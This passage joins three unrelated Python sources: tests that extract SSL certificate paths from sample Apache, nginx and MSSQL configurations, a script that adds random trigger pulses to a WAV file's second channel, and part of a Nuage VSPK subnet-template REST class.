SSLCertificateChainFile "/etc/pki/katello/certs/katello-server-ca_d.crt"
SSLVerifyClient optional
SSLCACertificateFile "/etc/pki/katello/certs/katello-default-ca_d.crt"
SSLVerifyDepth 3
SSLOptions +StdEnvVars +ExportCertData
</VirtualHost>
<VirtualHost *:443>
## SSL directives
ServerName f.g.e.com
SSLEngine off
SSLCertificateFile "/etc/pki/katello/certs/katello-apache_e.crt"
SSLCertificateKeyFile "/etc/pki/katello/private/katello-apache_e.key"
SSLCertificateChainFile "/etc/pki/katello/certs/katello-server-ca_e.crt"
SSLVerifyClient optional
SSLCACertificateFile "/etc/pki/katello/certs/katello-default-ca_e.crt"
SSLVerifyDepth 3
SSLOptions +StdEnvVars +ExportCertData
</VirtualHost>
""".strip()
HTTPD_CONF_WITHOUT_SSL = """
<VirtualHost *:80>
ServerName a.b.c.com
</VirtualHost>
""".strip()
HTTPD_SSL_CONF_NO_VALUE = """
<VirtualHost *:443>
## SSL directives
SSLEngine off
SSLCertificateFile ""
SSLCertificateKeyFile ""
SSLCertificateChainFile ""
</VirtualHost>
""".strip()
NGINX_CONF = """
http {
listen 80;
listen 443;
include /etc/nginx/conf.d/*.conf;
}
""".strip()
NGINX_SSL_CONF = """
server {
ssl_certificate "/a/b/c.rsa.crt";
ssl_certificate_key "/a/b/c.rsa.key";
ssl_certificate "/a/b/c.cecdsa.crt";
ssl_certificate_key "/a/b/c.cecdsa.key";
}
""".strip()
NGINX_SSL_CONF_MULTIPLE_SERVERS = """
server {
listen 443 ssl;
server_name www.example.com;
ssl_certificate "/a/b/www.example.com.crt";
ssl_certificate_key "/a/b/www.example.com.key";
ssl_certificate "/a/b/www.example.com.cecdsa.crt";
ssl_certificate_key "/a/b/www.example.com.cecdsa.key";
}
server {
listen 443 ssl;
server_name www.example.org;
ssl_certificate "/a/b/www.example.org.crt";
ssl_certificate_key "/a/b/www.example.org.key";
}
""".strip()
NGINX_CONF_WITHOUT_SSL = """
server {
server_name 'a.b.c.com';
}
""".strip()
MSSQL_WITH_TLS = """
[sqlagent]
enabled = true
[EULA]
accepteula = Y
[memory]
memorylimitmb = 2048
[network]
tlscert = /tmp/mssql.pem
""".strip()
MSSQL_WITHOUT_TLS = """
[sqlagent]
enabled = true
[EULA]
accepteula = Y
[memory]
memorylimitmb = 2048
""".strip()
HTTPD_NSS_CERT_ENDATE = """
Not After : Mon Jan 18 07:02:43 2038
""".strip()
HTTPD_WITH_NSS = """
Listen 8443
<VirtualHost _default_:8443>
ServerName www.examplea.com:8443
NSSEngine on
NSSCertificateDatabase /etc/httpd/aliasa
NSSNickname testcerta
</VirtualHost>
<VirtualHost :8443>
ServerName www.exampleb.com:8443
NSSEngine on
NSSCertificateDatabase /etc/httpd/aliasb
NSSNickname testcertb
</VirtualHost>
<VirtualHost :8443>
ServerName www.examplec.com:8443
NSSEngine off
NSSCertificateDatabase /etc/httpd/aliasc
NSSNickname testcertc
</VirtualHost>
""".strip()
HTTPD_WITH_NSS_OFF = """
Listen 8443
<VirtualHost _default_:8443>
NSSEngine off
NSSCertificateDatabase /etc/httpd/alias
NSSNickname testcert
</VirtualHost>
""".strip()
def test_httpd_certificate():
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_SSL_CONF, path='/etc/httpd/conf.d/ssl.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker = {
HttpdConfTree: conf_tree
}
result = httpd_ssl_certificate_files(broker)
assert result == ['/etc/pki/katello/certs/katello-apache.crt']
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_SSL_CONF_2, path='/etc/httpd/conf.d/ssl.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker = {
HttpdConfTree: conf_tree
}
result = httpd_ssl_certificate_files(broker)
# "/etc/pki/katello/certs/katello-apache_e.crt" not in the result
assert result == ['/etc/pki/katello/certs/katello-apache.crt', '/etc/pki/katello/certs/katello-apache_d.crt']
def test_nginx_certificate():
conf1 = _NginxConf(context_wrap(NGINX_CONF, path='/etc/nginx/nginx.conf'))
conf2 = _NginxConf(context_wrap(NGINX_SSL_CONF, path='/etc/nginx/conf.d/ssl.conf'))
conf_tree = NginxConfTree([conf1, conf2])
broker = {
NginxConfTree: conf_tree
}
result = nginx_ssl_certificate_files(broker)
assert result == ['/a/b/c.rsa.crt', '/a/b/c.cecdsa.crt']
conf1 = _NginxConf(context_wrap(NGINX_CONF, path='/etc/nginx/nginx.conf'))
conf2 = _NginxConf(context_wrap(NGINX_SSL_CONF_MULTIPLE_SERVERS, path='/etc/nginx/conf.d/ssl.conf'))
conf_tree = NginxConfTree([conf1, conf2])
broker = {
NginxConfTree: conf_tree
}
result = nginx_ssl_certificate_files(broker)
assert result == ['/a/b/www.example.com.crt', '/a/b/www.example.com.cecdsa.crt', '/a/b/www.example.org.crt']
def test_httpd_ssl_cert_exception():
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_CONF_WITHOUT_SSL, path='/etc/httpd/conf.d/no_ssl.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker1 = {
HttpdConfTree: conf_tree
}
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_SSL_CONF_NO_VALUE, path='/etc/httpd/conf.d/no_ssl.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker2 = {
HttpdConfTree: conf_tree
}
with pytest.raises(SkipComponent):
httpd_ssl_certificate_files(broker1)
httpd_ssl_certificate_files(broker2)
def test_nginx_ssl_cert_exception():
conf1 = _NginxConf(context_wrap(NGINX_CONF, path='/etc/nginx/nginx.conf'))
conf2 = _NginxConf(context_wrap(NGINX_CONF_WITHOUT_SSL, path='/etc/nginx/conf.d/no_ssl.conf'))
conf_tree = NginxConfTree([conf1, conf2])
broker1 = {
NginxConfTree: conf_tree
}
with pytest.raises(SkipComponent):
nginx_ssl_certificate_files(broker1)
def test_mssql_tls_cert_exception():
conf1 = MsSQLConf(context_wrap(MSSQL_WITH_TLS, path='/var/opt/mssql/mssql.conf'))
broker1 = {
MsSQLConf: conf1
}
result = mssql_tls_cert_file(broker1)
assert result == "/tmp/mssql.pem"
def test_mssql_tls_no_cert_exception():
conf1 = MsSQLConf(context_wrap(MSSQL_WITHOUT_TLS, path='/var/opt/mssql/mssql.conf'))
broker1 = {
MsSQLConf: conf1
}
with pytest.raises(SkipComponent):
mssql_tls_cert_file(broker1)
def test_httpd_certificate_info_in_nss():
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_WITH_NSS, path='/etc/httpd/conf.d/nss.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker = {
HttpdConfTree: conf_tree
}
result = httpd_certificate_info_in_nss(broker)
assert result == [('/etc/httpd/aliasa', 'testcerta'), ('/etc/httpd/aliasb', 'testcertb')]
def test_httpd_certificate_info_in_nss_exception():
conf1 = _HttpdConf(context_wrap(HTTPD_CONF, path='/etc/httpd/conf/httpd.conf'))
conf2 = _HttpdConf(context_wrap(HTTPD_WITH_NSS_OFF, path='/etc/httpd/conf.d/nss.conf'))
conf_tree = HttpdConfTree([conf1, conf2])
broker = {
HttpdConfTree: conf_tree
}
with pytest.raises(SkipComponent):
httpd_certificate_info_in_nss(broker)
|
|
# Lint as: python2, python3
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Code to add trigger events to second channel of an audio file.
This code generates a sequence of random event times, and then adds a pulse
at these times to the second channel of an audio file, so that we can trigger
the Natus event box.
To run:
add_trigger \
--input_filename test_data/tapestry.wav \
--output_filename /tmp/tapestry_events.wav --verbose True
--number_of_events 5
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
from absl import logging
import numpy as np
import scipy.io.wavfile
import six
from six.moves import range
from google3.pyglib import gfile
FLAGS = flags.FLAGS
flags.DEFINE_string('input_filename', None, 'Input audio filename')
flags.DEFINE_string('output_filename', None, 'Output audio filename')
flags.DEFINE_integer('number_of_events', -1,
'Number of events to add (-X for 1 per X seconds.)')
flags.DEFINE_boolean('verbose', False, 'Show log messages.')
flags.DEFINE_float('pulse_length', 0.1, 'Length of the pulse (seconds)')
flags.DEFINE_float('pulse_freq', 0, 'Frequency of the pulse (Hz)')
def random_times(duration, number, minimum_interval=0.5, include_zero=True):
"""Return a list of random times with at least the minimum interval between.
Args:
duration: Maximum time for an event (seconds)
number: Desired number of events
minimum_interval: Minimum time between events
include_zero: Whether the first point should be at 0.0
Returns:
A sorted list of event times or None if I can't find a list that satisfies
the constraints..
"""
if (number - 1)*minimum_interval > duration:
raise ValueError('Not enough time for %d events with %gs between them in '
'%gs.' % (number, minimum_interval, duration))
number = int(number) # So array sizes are integers
for _ in range(1000): # Try a bunch of times to get a good set of times.
bucket_of_times = np.random.uniform(low=0, high=duration, size=8*number)
if include_zero:
bucket_of_times[0] = 0.0
while len(bucket_of_times) >= number:
sorted_times = np.sort(bucket_of_times[:number])
intervals = sorted_times[1:number] - sorted_times[0:(number-1)]
# Look for intervals that are too close together.
too_short_indices = np.nonzero(intervals < minimum_interval)
too_short_indices = too_short_indices[0]
if too_short_indices.shape[0]:
# For each time at the end of a too-short interval...
for t in sorted_times[too_short_indices+1]:
# Find the time in the unsorted list
item_index = np.nonzero(np.abs(bucket_of_times - t) <
minimum_interval/10.0)[0]
# Don't remove the event at time zero (if called for).
if include_zero and item_index.shape[0] > 0 and item_index[0] == 0:
item_index = item_index[1:]
# Delete the bad time.
bucket_of_times = np.delete(bucket_of_times, item_index)
if include_zero:
assert bucket_of_times[0] == 0.0, ('at %g, item_index=%s, %s' %
(t, item_index, random_times))
else:
return sorted_times
return None
def add_events_to_audio(audio_signal, event_times, fs=16000,
pulse_length=0.1, pulse_freq=0):
"""Add pulses to an audio channel to indicate the event times.
Given a list of event times, add a second channel to the audio_signal that
pulses at the right time. By default the pulses are full-scale positive DC
pulses, but a frequency can be specified to turn them into full-scale tone-
blips.
Args:
audio_signal: a 1D np.ndarray with the audio data
event_times: A list or np.ndarray of event times (largest must be less
than the length of the audio signal.)
fs: sampling frequency of the audio signal.
pulse_length: length of the pulse (or tone blip) in seconds
pulse_freq: if non-zero, the frequency of the tone blip indicating an event.
Returns:
A stereo audio signal, with the original audio in channel (column) 0, and
the tone blips in the second channel. Final size is num_times x 2.
"""
if not isinstance(audio_signal, np.ndarray):
raise TypeError('audio signal must be an np.ndarray')
audio_signal = audio_signal.astype(np.int16)
audio_signal = audio_signal.squeeze()
if len(audio_signal.shape) > 1:
channels = tuple(range(1, len(audio_signal.shape)))
audio_signal = np.mean(audio_signal, axis=channels)
if len(audio_signal.shape) != 1:
raise TypeError('audio signal (after squeezing) must be 1-dimensional.')
if fs < 8000.0: # Make sure it's an audio frequency
raise ValueError('Sampling rate is generally > 8000Hz.')
if not (isinstance(event_times, list) or
isinstance(event_times, np.ndarray)) or len(event_times) < 3:
raise ValueError('event_times must be a list of at least 3 elements.')
audio_length = audio_signal.shape[0]
new_channel = np.zeros((audio_length, 1), dtype=np.int16)
for t in event_times*fs:
t = int(t)
new_channel[t:t+int(fs*pulse_length)] = 32767 # Largest int16
if pulse_freq > 0: # Convert the pulse into a tone.
new_channel = np.multiply(new_channel,
np.sin(np.reshape(np.arange(audio_length),
(-1, 1))/
float(fs)*2*np.pi*pulse_freq))
stereo_signal = np.concatenate((np.reshape(audio_signal, (-1, 1)),
np.reshape(new_channel, (-1, 1))),
axis=1).astype(np.int16)
return stereo_signal
def read_audio_wave_file(audio_filename):
if not isinstance(audio_filename, six.string_types):
raise TypeError('audio_filename must be a string.')
# Use gfile.Open so we can read files from all sorts of file systems.
with gfile.Open(audio_filename) as fp:
[fs, audio_signal] = scipy.io.wavfile.read(fp)
logging.info('Read_audio_file: Read %s samples from %s at %gHz.',
audio_signal.shape, audio_filename, fs)
assert audio_signal.dtype == np.int16
return fs, audio_signal
def write_audio_wave_file(audio_filename, audio_signal, fs):
if not isinstance(audio_filename, six.string_types):
raise TypeError('audio_filename must be a string.')
if not isinstance(audio_signal, np.ndarray):
raise TypeError('audio_signal must be an np.ndarray')
# Use gfile.Open so we can read files from all sorts of file systems.
with gfile.Open(audio_filename, 'w') as fp:
scipy.io.wavfile.write(fp, fs, audio_signal)
logging.info('Write_audio_file: wrote %s samples to %s at %gHz.',
audio_signal.shape, audio_filename, fs)
def main(_):
if FLAGS.verbose:
logging.set_verbosity(logging.INFO)
if FLAGS.pulse_length <= 0.0:
raise ValueError('Pulse length (%g) must be greater than 0.' %
FLAGS.pulse_length)
[audio_fs, audio_signal] = read_audio_wave_file(FLAGS.input_filename)
audio_seconds = audio_signal.shape[0]/float(audio_fs)
if FLAGS.number_of_events < 0:
number = int(audio_seconds)//(-FLAGS.number_of_events)
elif FLAGS.number_of_events == 0:
raise ValueError('Can not add 0 events.')
else:
number = FLAGS.number_of_events
event_times = random_times(audio_seconds - 2*FLAGS.pulse_length,
number=number,
minimum_interval=0.5,
include_zero=True)
logging.info('Adding events at times: %s',
','.join(str(e) for e in event_times))
stereo_signal = add_events_to_audio(audio_signal, event_times, audio_fs,
pulse_length=FLAGS.pulse_length,
pulse_freq=FLAGS.pulse_freq)
write_audio_wave_file(FLAGS.output_filename, stereo_signal, audio_fs)
if __name__ == '__main__':
flags.mark_flags_as_required(['input_filename', 'output_filename'])
app.run(main)
|
|
# -*- coding: utf-8 -*-
#
# Copyright (c) 2015, Alcatel-Lucent Inc, 2017 Nokia
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from .fetchers import NUAddressRangesFetcher
from .fetchers import NUPermissionsFetcher
from .fetchers import NUMetadatasFetcher
from .fetchers import NUGlobalMetadatasFetcher
from .fetchers import NUQOSsFetcher
from .fetchers import NUSubnetsFetcher
from .fetchers import NUEventLogsFetcher
from bambou import NURESTObject
class NUSubnetTemplate(NURESTObject):
""" Represents a SubnetTemplate in the VSD
Notes:
As domain and zone objects, subnet objects are created in VSD as derived by templates. This object describes the subnet template.
"""
__rest_name__ = "subnettemplate"
__resource_name__ = "subnettemplates"
## Constants
CONST_USE_GLOBAL_MAC_DISABLED = "DISABLED"
CONST_USE_GLOBAL_MAC_ENABLED = "ENABLED"
CONST_MULTICAST_DISABLED = "DISABLED"
CONST_ENCRYPTION_ENABLED = "ENABLED"
CONST_ENTITY_SCOPE_GLOBAL = "GLOBAL"
CONST_ENCRYPTION_DISABLED = "DISABLED"
CONST_USE_GLOBAL_MAC_ENTERPRISE_DEFAULT = "ENTERPRISE_DEFAULT"
CONST_DPI_ENABLED = "ENABLED"
CONST_ENTITY_SCOPE_ENTERPRISE = "ENTERPRISE"
CONST_IP_TYPE_IPV6 = "IPV6"
CONST_DPI_INHERITED = "INHERITED"
CONST_IP_TYPE_IPV4 = "IPV4"
CONST_MULTICAST_ENABLED = "ENABLED"
CONST_MULTICAST_INHERITED = "INHERITED"
CONST_DPI_DISABLED = "DISABLED"
CONST_ENCRYPTION_INHERITED = "INHERITED"
CONST_IP_TYPE_DUALSTACK = "DUALSTACK"
def __init__(self, **kwargs):
""" Initializes a SubnetTemplate instance
Notes:
You can specify all parameters while calling this methods.
A special argument named `data` will enable you to load the
object from a Python dictionary
Examples:
>>> subnettemplate = NUSubnetTemplate(id=u'xxxx-xxx-xxx-xxx', name=u'SubnetTemplate')
>>> subnettemplate = NUSubnetTemplate(data=my_dict)
"""
super(NUSubnetTemplate, self).__init__()
# Read/Write Attributes
self._dpi = None
self._ip_type = None
self._ipv6_address = None
self._ipv6_gateway = None
self._name = None
self._last_updated_by = None
self._last_updated_date = None
self._gateway = None
self._address = None
self._description = None
self._netmask = None
self._embedded_metadata = None
self._encryption = None
self._entity_scope = None
self._split_subnet = None
self._creation_date = None
self._proxy_arp = None
self._use_global_mac = None
self._associated_multicast_channel_map_id = None
self._dual_stack_dynamic_ip_allocation = None
self._multicast = None
self._owner = None
self._external_id = None
self.expose_attribute(local_name="dpi", remote_name="DPI", attribute_type=str, is_required=False, is_unique=False, choices=[u'DISABLED', u'ENABLED', u'INHERITED'])
self.expose_attribute(local_name="ip_type", remote_name="IPType", attribute_type=str, is_required=False, is_unique=False, choices=[u'DUALSTACK', u'IPV4', u'IPV6'])
self.expose_attribute(local_name="ipv6_address", remote_name="IPv6Address", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="ipv6_gateway", remote_name="IPv6Gateway", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="name", remote_name="name", attribute_type=str, is_required=True, is_unique=False)
self.expose_attribute(local_name="last_updated_by", remote_name="lastUpdatedBy", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="last_updated_date", remote_name="lastUpdatedDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="gateway", remote_name="gateway", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="address", remote_name="address", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="description", remote_name="description", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="netmask", remote_name="netmask", attribute_type=str, is_required=True, is_unique=False)
self.expose_attribute(local_name="embedded_metadata", remote_name="embeddedMetadata", attribute_type=list, is_required=False, is_unique=False)
self.expose_attribute(local_name="encryption", remote_name="encryption", attribute_type=str, is_required=False, is_unique=False, choices=[u'DISABLED', u'ENABLED', u'INHERITED'])
self.expose_attribute(local_name="entity_scope", remote_name="entityScope", attribute_type=str, is_required=False, is_unique=False, choices=[u'ENTERPRISE', u'GLOBAL'])
self.expose_attribute(local_name="split_subnet", remote_name="splitSubnet", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="creation_date", remote_name="creationDate", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="proxy_arp", remote_name="proxyARP", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="use_global_mac", remote_name="useGlobalMAC", attribute_type=str, is_required=False, is_unique=False, choices=[u'DISABLED', u'ENABLED', u'ENTERPRISE_DEFAULT'])
self.expose_attribute(local_name="associated_multicast_channel_map_id", remote_name="associatedMulticastChannelMapID", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="dual_stack_dynamic_ip_allocation", remote_name="dualStackDynamicIPAllocation", attribute_type=bool, is_required=False, is_unique=False)
self.expose_attribute(local_name="multicast", remote_name="multicast", attribute_type=str, is_required=False, is_unique=False, choices=[u'DISABLED', u'ENABLED', u'INHERITED'])
self.expose_attribute(local_name="owner", remote_name="owner", attribute_type=str, is_required=False, is_unique=False)
self.expose_attribute(local_name="external_id", remote_name="externalID", attribute_type=str, is_required=False, is_unique=True)
# Fetchers
self.address_ranges = NUAddressRangesFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.permissions = NUPermissionsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.metadatas = NUMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.global_metadatas = NUGlobalMetadatasFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.qoss = NUQOSsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.subnets = NUSubnetsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self.event_logs = NUEventLogsFetcher.fetcher_with_object(parent_object=self, relationship="child")
self._compute_args(**kwargs)
# Properties
@property
def dpi(self):
""" Get dpi value.
Notes:
determines whether or not Deep packet inspection is enabled
This attribute is named `DPI` in VSD API.
"""
return self._dpi
@dpi.setter
def dpi(self, value):
""" Set dpi value.
Notes:
determines whether or not Deep packet inspection is enabled
This attribute is named `DPI` in VSD API.
"""
self._dpi = value
@property
def ip_type(self):
""" Get ip_type value.
Notes:
IPv4, DUALSTACK or IPv6
This attribute is named `IPType` in VSD API.
"""
return self._ip_type
@ip_type.setter
def ip_type(self, value):
""" Set ip_type value.
Notes:
IPv4, DUALSTACK or IPv6
This attribute is named `IPType` in VSD API.
"""
self._ip_type = value
@property
def ipv6_address(self):
""" Get ipv6_address value.
Notes:
IPv6 range of the subnet. In case of zone, this is an optional field for and allows users to allocate an IP address range to a zone. The VSD will auto-assign IP addresses to subnets from this range if a specific IP address is not defined for the subnet
This attribute is named `IPv6Address` in VSD API.
"""
return self._ipv6_address
@ipv6_address.setter
def ipv6_address(self, value):
""" Set ipv6_address value.
Notes:
IPv6 range of the subnet. In case of zone, this is an optional field for and allows users to allocate an IP address range to a zone. The VSD will auto-assign IP addresses to subnets from this range if a specific IP address is not defined for the subnet
This attribute is named `IPv6Address` in VSD API.
"""
self._ipv6_address = value
@property
def ipv6_gateway(self):
""" Get ipv6_gateway value.
Notes:
The IPv6 address of the gateway of this subnet
This attribute is named `IPv6Gateway` in VSD API.
"""
return self._ipv6_gateway
@ipv6_gateway.setter
def ipv6_gateway(self, value):
""" Set ipv6_gateway value.
Notes:
The IPv6 address of the gateway of this subnet
This attribute is named `IPv6Gateway` in VSD API.
"""
self._ipv6_gateway = value
@property
def name(self):
""" Get name value.
Notes:
Name of the current entity(Zone or zone template or subnet etc..) Valid characters are alphabets, numbers, space and hyphen( - ).
"""
return self._name
@name.setter
def name(self, value):
""" Set name value.
Notes:
Name of the current entity(Zone or zone template or subnet etc..) Valid characters are alphabets, numbers, space and hyphen( - ).
"""
self._name = value
@property
def last_updated_by(self):
""" Get last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
return self._last_updated_by
@last_updated_by.setter
def last_updated_by(self, value):
""" Set last_updated_by value.
Notes:
ID of the user who last updated the object.
This attribute is named `lastUpdatedBy` in VSD API.
"""
self._last_updated_by = value
@property
def last_updated_date(self):
""" Get last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
return self._last_updated_date
@last_updated_date.setter
def last_updated_date(self, value):
""" Set last_updated_date value.
Notes:
Time stamp when this object was last updated.
This attribute is named `lastUpdatedDate` in VSD API.
"""
self._last_updated_date = value
@property
def gateway(self):
""" Get gateway value.
Notes:
The IP address of the gateway of this subnet
"""
return self._gateway
@gateway.setter
def gateway(self, value):
""" Set gateway value.
Notes:
The IP address of the gateway of this subnet
"""
self._gateway = value
@property
def address(self):
""" Get address value.
Notes:
IP address of the subnet defined. In case of zone, this is an optional field for and allows users to allocate an IP address range to a zone. The VSD will auto-assign IP addresses to subnets from this range if a specific IP address is not defined for the subnet
"""
return self._address
@address.setter
def address(self, value):
""" Set address value.
Notes:
IP address of the subnet defined. In case of zone, this is an optional field for and allows users to allocate an IP address range to a zone. The VSD will auto-assign IP addresses to subnets from this range if a specific IP address is not defined for the subnet
"""
self._address = value
@property
def description(self):
""" Get description value.
Notes:
A description field provided by the user that identifies the subnet
"""
return self._description
@description.setter
def description(self, value):
""" Set description value.
Notes:
A description field provided by the user that identifies the subnet
"""
self._description = value
@property
def netmask(self):
""" Get netmask value.
Notes:
Netmask of the subnet defined
"""
return self._netmask
@netmask.setter
def netmask(self, value):
""" Set netmask value.
Notes:
Netmask of the subnet defined
"""
self._netmask = value
@property
def embedded_metadata(self):
""" Get embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
return self._embedded_metadata
@embedded_metadata.setter
def embedded_metadata(self, value):
""" Set embedded_metadata value.
Notes:
Metadata objects associated with this entity. This will contain a list of Metadata objects if the API request is made using the special flag to enable the embedded Metadata feature. Only a maximum of Metadata objects is returned based on the value set in the system configuration.
This attribute is named `embeddedMetadata` in VSD API.
"""
self._embedded_metadata = value
@property
def encryption(self):
""" Get encryption value.
Notes:
Determines whether or not IPSEC is enabled. Possible values are INHERITED, ENABLED, DISABLED, .
"""
return self._encryption
@encryption.setter
def encryption(self, value):
""" Set encryption value.
Notes:
Determines whether or not IPSEC is enabled. Possible values are INHERITED, ENABLED, DISABLED, .
"""
self._encryption = value
@property
def entity_scope(self):
""" Get entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
return self._entity_scope
@entity_scope.setter
def entity_scope(self, value):
""" Set entity_scope value.
Notes:
Specify if scope of entity is Data center or Enterprise level
This attribute is named `entityScope` in VSD API.
"""
self._entity_scope = value
@property
def split_subnet(self):
""" Get split_subnet value.
Notes:
Block subnet routes
This attribute is named `splitSubnet` in VSD API.
"""
return self._split_subnet
@split_subnet.setter
def split_subnet(self, value):
""" Set split_subnet value.
Notes:
Block subnet routes
This attribute is named `splitSubnet` in VSD API.
"""
self._split_subnet = value
@property
def creation_date(self):
""" Get creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
return self._creation_date
@creation_date.setter
def creation_date(self, value):
""" Set creation_date value.
Notes:
Time stamp when this object was created.
This attribute is named `creationDate` in VSD API.
"""
self._creation_date = value
@property
def proxy_arp(self):
""" Get proxy_arp value.
Notes:
When set, VRS will act as ARP Proxy
This attribute is named `proxyARP` in VSD API.
"""
return self._proxy_arp
@proxy_arp.setter
def proxy_arp(self, value):
""" Set proxy_arp value.
Notes:
When set, VRS will act as ARP Proxy
This attribute is named `proxyARP` in VSD API.
"""
self._proxy_arp = value
@property
def use_global_mac(self):
""" Get use_global_mac value.
Notes:
if this flag is enabled, the system configured globalMACAddress will be used as the gateway mac address
This attribute is named `useGlobalMAC` in VSD API.
"""
return self._use_global_mac
@use_global_mac.setter
def use_global_mac(self, value):
""" Set use_global_mac value.
Notes:
if this flag is enabled, the system configured globalMACAddress will be used as the gateway mac address
This attribute is named `useGlobalMAC` in VSD API.
"""
self._use_global_mac = value
@property
def associated_multicast_channel_map_id(self):
""" Get associated_multicast_channel_map_id value.
Notes:
The ID of the Multi Cast Channel Map this Subnet/Subnet Template is associated with. This has to be set when enableMultiCast is set to ENABLED
This attribute is named `associatedMulticastChannelMapID` in VSD API.
"""
return self._associated_multicast_channel_map_id
@associated_multicast_channel_map_id.setter
def associated_multicast_channel_map_id(self, value):
""" Set associated_multicast_channel_map_id value.
Notes:
The ID of the Multi Cast Channel Map this Subnet/Subnet Template is associated with. This has to be set when enableMultiCast is set to ENABLED
This attribute is named `associatedMulticastChannelMapID` in VSD API.
"""
self._associated_multicast_channel_map_id = value
@property
def dual_stack_dynamic_ip_allocation(self):
""" Get dual_stack_dynamic_ip_allocation value.
Notes:
This value indicates whether dynamic address allocation is enabled or not. This will be applicable when subnet template is in dual stack mode
This attribute is named `dualStackDynamicIPAllocation` in VSD API.
"""
return self._dual_stack_dynamic_ip_allocation
@dual_stack_dynamic_ip_allocation.setter
def dual_stack_dynamic_ip_allocation(self, value):
""" Set dual_stack_dynamic_ip_allocation value.
Notes:
This value indicates whether dynamic address allocation is enabled or not. This will be applicable when subnet template is in dual stack mode
This attribute is named `dualStackDynamicIPAllocation` in VSD API.
"""
self._dual_stack_dynamic_ip_allocation = value
@property
def multicast(self):
""" Get multicast value.
Notes:
Indicates multicast policy on Subnet/Subnet Template.
"""
return self._multicast
@multicast.setter
def multicast(self, value):
""" Set multicast value.
Notes:
Indicates multicast policy on Subnet/Subnet Template.
"""
self._multicast = value
@property
def owner(self):
""" Get owner value.
Notes:
Identifies the user that has created this object.
"""
return self._owner
@owner.setter
def owner(self, value):
""" Set owner value.
Notes:
Identifies the user that has created this object.
"""
self._owner = value
@property
def external_id(self):
""" Get external_id value.
Notes:
External object ID. Used for integration with third party systems
This attribute is named `externalID` in VSD API.
"""
return self._external_id
@external_id.setter
def external_id(self, value):
""" Set external_id value.
Notes:
